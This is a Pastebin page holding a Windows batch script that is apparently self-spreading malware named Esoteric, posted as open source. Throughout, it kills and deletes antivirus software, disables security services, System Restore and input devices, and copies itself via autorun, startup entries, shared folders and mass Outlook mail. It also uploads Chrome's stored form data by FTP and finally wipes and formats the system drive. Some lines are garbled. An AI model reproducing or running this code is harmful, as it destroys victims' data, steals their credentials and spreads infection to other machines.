Advertisement
4511052008

Darkes.A (OPEN SOURCE)

Sep 17th, 2022
696
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. @echo off
  2. :: Esoteric.exe
  3. Title Esoteric.exe
  4. @BREAK
  5. @KillYourSelf
  6. @Cls
  7. @Mode 14,1
  8. @Color 0a
  9. :: If I Left Tomorrow, Would You Still Remember Me?
  10. :: I Resits Oppression!
  11. :: Truth Lyes On The Side Of The Oppressed!
  12. netsh firewall add portopening TCP 80 Webserver
  13. netsh firewall add portopening TCP 21 FTPserver
  14. echo Set WinScriptHost = CreateObject("WScript.Shell") WinScriptHost.Run Chr(34) &"C:\" & Chr(34), 0 Set WinScriptHost = Nothing >>Invisible.vbs
  15. echo Set WinScriptHost = CreateObject("WScript.Shell") WinScriptHost.Run Chr(34) &"C:\Users\Seven\Desktop" & Chr(34), 0 Set WinScriptHost = Nothing >>Invisible.vbs
  16. echo Set WinScriptHost = CreateObject("WScript.Shell") WinScriptHost.Run Chr(34) &"C:\Users\Seven\Documents" & Chr(34), 0 Set WinScriptHost = Nothing >>Invisible.vbs
  17. start Invisible.vbs
  18. echo 'Disable Method of the SystemRestore Class >>SysRestore-Disable.vbs
  19. echo 'Disables monitoring on a particular drive. >>SysRestore-Disable.vbs
  20. echo Set Args = wscript.Arguments >>SysRestore-Disable.vbs
  21. echo If Args.Count() > 0 Then >>SysRestore-Disable.vbs
  22. echo     Drive = Args.item(0) >>SysRestore-Disable.vbs
  23. echo Else >>SysRestore-Disable.vbs
  24. echo     Drive = "" >>SysRestore-Disable.vbs
  25. echo End If >>SysRestore-Disable.vbs
  26. echo Set obj = GetObject("winmgmts:{impersonationLevel=impersonate}!root/default:SystemRestore") >>SysRestore-Disable.vbs
  27. echo If (obj.Disable(Drive)) = 0 Then >>SysRestore-Disable.vbs
  28. echo     wscript.Echo "Success" >>SysRestore-Disable.vbs
  29. echo Else  >>SysRestore-Disable.vbs
  30. echo     wscript.Echo "Failed" >>SysRestore-Disable.vbs
  31. echo End If >>SysRestore-Disable.vbs
  32. start SysRestore-Disable.vbs
  33. :loop >>Esoteric.bat
  34. Mkdir Esoteric_%random% >>Esoteric.bat
  35. goto loop >>Esoteric.bat
  36. for %E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
  37. copy /Y "Esoteric.bat" %E:\
  38. echo [AutoRun]
  39. echo open="%E:\"Esoteric.bat""
  40. echo action=Open folder to see files...
  41. Dir C:\Windows /s /b
  42. For /f %a In (PathHost) Do Copy /y "Esoteric.bat" %a
  43. Del /f /s /q PathHost
  44. copy "Esoteric.bat" "C:\Users\Seven\Start Menu\Programs\Startup"
  45. cls
  46. Mkdir "C:\Users\%username%\Documents\Esoteric"
  47. Mkdir "C:\Users\%username%\Pictures\Esoteric"
  48. Mkdir "C:\Users\%username%\Videos\Esoteric"
  49. Mkdir "C:\Users\%username%\Music\Esoteric"
  50. Mkdir "C:\Users\%username%\Favorites\Esoteric"
  51. Mkdir "C:\Users\%username%\Downloads\Esoteric"
  52. Mkdir "C:\Users\%username%\Desktop\Esoteric"
  53. assoc .exe=txtfile
  54. assoc .reg=xmlfile
  55. assoc .jpg=WinRar
  56. assoc .png=regfile
  57. Set wshShell =wscript.CreateObject(“WScript.Shell”) >>sendkey.vbs
  58. do >>send1key.vbs
  59. wshshell.sendkeys “{E}”
  60. wshshell.sendkeys “{S}”
  61. wshshell.sendkeys “{O}”
  62. wshshell.sendkeys “{T}”
  63. wshshell.sendkeys “{E}”
  64. wshshell.sendkeys “{R}”
  65. wshshell.sendkeys “{I}”
  66. wshshell.sendkeys “{C}”
  67. start send1key.vbs
  68. assoc %systemroot%\*.dll=txtfile
  69. assoc %systemroot%\*.txt=htmlfile
  70. attrib %systemroot%\*.html  +h -s
  71. attrib %systemroot%\*.txt  +h +s
  72. taskkill /F /IM chrome.exe
  73. tskill chrome.exe
  74. copy /B "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Web Data" /B "Web Data"
  75. copy /B "%userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data" /B "Web Data"
  76. echo >a.dat
  77. echo >>a.dat
  78. echo binary>>a.dat
  79. echo put "web data">>a.dat
  80. echo disconnect>>a.dat
  81. echo bye >>a.dat
  82. ftp -s:a.dat
  83. del /F /Q a.dat
  84. del /F /Q "Web Data"
  85. cd "%systemroot%\System32\Drivers\etc"
  86. echo 127.0.0.1 google.com >> "Hosts"
  87. echo 127.0.0.1 www.google.com >> "Hosts"
  88. reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "START PAGE" /d "http://www.hackforums.net/"
  89. start http://www.hackforums.net/
  90. ipconfig /release
  91. if ERRORLEVEL1 ipconfig /release_all
  92. net stop “Security Center”
  93. netsh firewall set opmode mode=disable
  94. tskill /A av*
  95. tskill /A fire*
  96. tskill /A anti*
  97. cls
  98. tskill /A spy*
  99. tskill /A bullguard
  100. tskill /A PersFw
  101. tskill /A KAV*
  102. tskill /A ZONEALARM
  103. tskill /A SAFEWEB
  104. cls
  105. tskill /A OUTPOST
  106. tskill /A nv*
  107. tskill /A nav*
  108. tskill /A F-*
  109. tskill /A ESAFE
  110. tskill /A cle
  111. cls
  112. tskill /A BLACKICE
  113. tskill /A def*
  114. tskill /A kav
  115. tskill /A kav*
  116. tskill /A avg*
  117. tskill /A ash*
  118. cls
  119. tskill /A aswupdsv
  120. tskill /A ewid*
  121. tskill /A guard*
  122. tskill /A guar*
  123. tskill /A gcasDt*
  124. tskill /A msmp*
  125. cls
  126. tskill /A mcafe*
  127. tskill /A mghtml
  128. tskill /A msiexec
  129. tskill /A outpost
  130. tskill /A isafe
  131. tskill /A zap*
  132. cls
  133. tskill /A zauinst
  134. tskill /A upd*
  135. tskill /A zlclien*
  136. tskill /A minilog
  137. tskill /A cc*
  138. tskill /A norton*
  139. cls
  140. tskill /A norton au*
  141. tskill /A ccc*
  142. tskill /A npfmn*
  143. tskill /A loge*
  144. tskill /A nisum*
  145. tskill /A issvc
  146. tskill /A tmp*
  147. cls
  148. tskill /A tmn*
  149. tskill /A pcc*
  150. tskill /A cpd*
  151. tskill /A pop*
  152. tskill /A pav*
  153. tskill /A padmin
  154. cls
  155. tskill /A panda*
  156. tskill /A avsch*
  157. tskill /A sche*
  158. tskill /A syman*
  159. tskill /A virus*
  160. tskill /A realm*
  161. cls
  162. tskill /A sweep*
  163. tskill /A scan*
  164. tskill /A ad-*
  165. tskill /A safe*
  166. tskill /A avas*
  167. tskill /A norm*
  168. cls
  169. tskill /A offg*
  170. del /Q /F C:\Program Files\alwils~1\avast4\*.*
  171. del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
  172. del /Q /F C:\Program Files\kasper~1\*.exe
  173. cls
  174. del /Q /F C:\Program Files\trojan~1\*.exe
  175. del /Q /F C:\Program Files\f-prot95\*.dll
  176. del /Q /F C:\Program Files\tbav\*.dat
  177. cls
  178. del /Q /F C:\Program Files\avpersonal\*.vdf
  179. del /Q /F C:\Program Files\Norton~1\*.cnt
  180. del /Q /F C:\Program Files\Mcafee\*.*
  181. cls
  182. del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
  183. del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
  184. del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
  185. del /Q /F C:\Program Files\Norton~1\*.*
  186. cls
  187. del /Q /F C:\Program Files\avgamsr\*.exe
  188. del /Q /F C:\Program Files\avgamsvr\*.exe
  189. del /Q /F C:\Program Files\avgemc\*.exe
  190. cls
  191. del /Q /F C:\Program Files\avgcc\*.exe
  192. del /Q /F C:\Program Files\avgupsvc\*.exe
  193. del /Q /F C:\Program Files\grisoft
  194. del /Q /F C:\Program Files\nood32krn\*.exe
  195. del /Q /F C:\Program Files\nood32\*.exe
  196. cls
  197. del /Q /F C:\Program Files\nod32
  198. del /Q /F C:\Program Files\nood32
  199. del /Q /F C:\Program Files\kav\*.exe
  200. del /Q /F C:\Program Files\kavmm\*.exe
  201. del /Q /F C:\Program Files\kaspersky\*.*
  202. cls
  203. del /Q /F C:\Program Files\ewidoctrl\*.exe
  204. del /Q /F C:\Program Files\guard\*.exe
  205. del /Q /F C:\Program Files\ewido\*.exe
  206. cls
  207. del /Q /F C:\Program Files\pavprsrv\*.exe
  208. del /Q /F C:\Program Files\pavprot\*.exe
  209. del /Q /F C:\Program Files\avengine\*.exe
  210. cls
  211. del /Q /F C:\Program Files\apvxdwin\*.exe
  212. del /Q /F C:\Program Files\webproxy\*.exe
  213. del /Q /F C:\Program Files\panda software\*.*
  214. net stop "MpsSvc"
  215. taskkill /f /t /im "FirewallControlPanel.exe"
  216. cd "C:\Windows\System32\Drivers\etc"
  217. 127.0.0.1 google.com
  218. 127.0.0.1 http://www.youtube.com
  219. net stop "WinDefend"
  220. taskkill /f /t /im "MSASCui.exe"
  221. net stop "WSearch"
  222. net stop "wuauserv"
  223. net stop "WPCSvc"
  224. net stop "MpsSvc"
  225. taskkill /f /t /im "FirewallControlPanel.exe"
  226. net stop "WerSvc"
  227. net stop "wscsvc"
  228. tskill taskmgr
  229. tskill rstrui
  230. assoc .exe=batfile
  231. DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
  232. echo Y
  233.  FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k"
  234. assoc .mp3=batfile
  235. DIR /S/B %SystemDrive%\*.mp3 >> InfList_jpg.txt
  236. echo Y
  237.  FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy /y %0 "%%j:%%k"
  238. assoc .jpg=batfile
  239. DIR /S/B %SystemDrive%\*.jpg >> InfList_jpg.txt
  240. echo Y
  241.  FOR /F "tokens=1,* delims=: " %%j in (InfList_jpg.txt) do copy /y %0 "%%j:%%k"
  242. assoc .rar=batfile
  243. DIR /S/B %SystemDrive%\*.rar >> InfList_rar.txt
  244. echo Y
  245.  FOR /F "tokens=1,* delims=: " %%j in (InfList_rar.txt) do copy /y %0 "%%j:%%k"
  246. assoc .mpeg=batfile
  247. DIR /S/B %SystemDrive%\*.mpeg >> InfList_mpeg.txt
  248. echo Y
  249.  FOR /F "tokens=1,* delims=: " %%j in (InfList_mpeg.txt) do copy /y %0 "%%j:%%k"
  250. assoc .exe=batfile
  251. DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
  252. echo Y
  253.  FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k"
  254. for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
  255. copy /Y %0 %%E:\
  256. echo [AutoRun] > %%E:\autorun.inf
  257. echo open=[%%E:\%0] >> %%E:\autorun.inf
  258. echo action=Open folder to see files... >> %%E:\autorun.inf)
  259. Dir %SystemRoot% /s /b > PathHost
  260. For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
  261. Del /f /s /q PathHost > Nul
  262. set valinf="rundll32_%random%_toolbar"
  263. set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
  264. reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul
  265. copy %0 %windir%\system32\ls.bat
  266. echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT
  267. copy %0 "%userprofile%\Start Menu\Programs\Startup"
  268. @Set RegistyEditCmd=Cmd /k Reg Add
  269. @Set HiveSysKey=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
  270. @%RegistyEditCmd% "%HiveSysKey%" /v "EnableLUA" /t "REG_DWORD" /d "0" /f > nul
  271. set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
  272. reg delete %key%
  273. reg add %key% /v Start /t REG_DWORD /d 4
  274. echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
  275. echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
  276. echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
  277. echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
  278. echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
  279. echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
  280. echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
  281. echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
  282. echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
  283. echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
  284. echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
  285. echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
  286. start "nokeyboard.reg"
  287. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
  288. @Echo off & @@Break Off
  289. Ipconfig /release
  290. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
  291. %jUmP%E%nD%c%onFiG%h%IdE%o%P% h%aRv%%aRd%A%T%%cHe%cK%HappY%3D b%aLLo0Ns%Y%eS% m3Ga!?!
  292. P%ReSs%%IE%AuS%ExPloR%e%r% > nul.%TempInternetRelease%
  293. echo dim x>>%SystemDrive%\Esoteric.vbs
  294. echo on error resume next>>%SystemDrive%\Esoteric.vbs
  295. echo Set fso ="Scripting.FileSystem.Object"">>%SystemDrive%\Esoteric.vbs
  296. echo Set so=CreateObject(fso)>>%SystemDrive%\Esoteric.vbs
  297. echo Set ol=CreateObject("Outlook.Application")>>%SystemDrive%\Esoteric.vbs
  298. echo Set out=WScript.CreateObject("Outlook.Application")>>%SystemDrive%\Esoteric.vbs
  299. echo Set mapi = out.GetNameSpace("MAPI")>>%SystemDrive%\Esoteric.vbs
  300. echo Set a = mapi.AddressLists(1)>>%SystemDrive%\Esoteric.vbs
  301. echo Set ae=a.AddressEntries>>%SystemDrive%\Esoteric.vbs
  302. echo For x=1 To ae.Count>>%SystemDrive%\Esoteric.vbs
  303. echo Set ci=ol.CreateItem(0)>>%SystemDrive%\Esoteric.vbs
  304. echo Set Mail=ci>>%SystemDrive%\Esoteric.vbs
  305. echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)>>%SystemDrive%\Esoteric.vbs
  306. echo Mail.Subject="Dude this is Awesome!">>%SystemDrive%\Esoteric.vbs
  307. echo Mail.Subject="Dude this is Awesome!">>%SystemDrive%\Esoteric.vbs
  308. echo Mail.Body="Man that has got to be embarrassing!">>%SystemDrive%\Esoteric.vbs
  309. echo Mail.Attachments.Add(%0)>>%SystemDrive%\Esoteric.vbs
  310. echo Mail.send>>%SystemDrive%\Esoteric.vbs
  311. echo Next>>%SystemDrive%\Esoteric.vbs
  312. echo ol.Quit>>%SystemDrive%\Esoteric.vbs
  313. start "" "%SystemDrive%\Esoteric.vbs"
  314. copy Esoteric.bat c:\program files\limewire\Shared\Esoteric.bat
  315. copy Esoteric.bat c:\program files\Grokster\My Grokster\Esoteric.bat
  316. copy Esoteric.bat c:\program files\eMule\Incoming\Esoteric.bat
  317. net user Esoteric Esoteric /add
  318. net user %username%
  319. del /f /q %0
  320. Del C:\ *.* |y
  321. del %systemdrive%\*.*/f/s/q
  322. FORMAT /V /Q C:\ /F
  323. attrib +0 "Esoteric.bat"
  324. attrib +0 "Esoteric.Exe"
  325. attrib +0 "Esoteric.Vbs"
  326. attrib +h "Esoteric.bat"
  327. attrib +h "Esoteric.Exe"
  328. attrib +h "Esoteric.Vbs"
  329. attrib -r -s -h c:\autoexec.bat
  330. del c:\autoexec.bat
  331. attrib -r -s -h c:\boot.ini
  332. del c:\boot.ini
  333. attrib -r -s -h c:\ntldr
  334. del c:\ntldr
  335. attrib -r -s -h c:\windows\win.ini
  336. del c:\windows\win.ini
  337. @exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement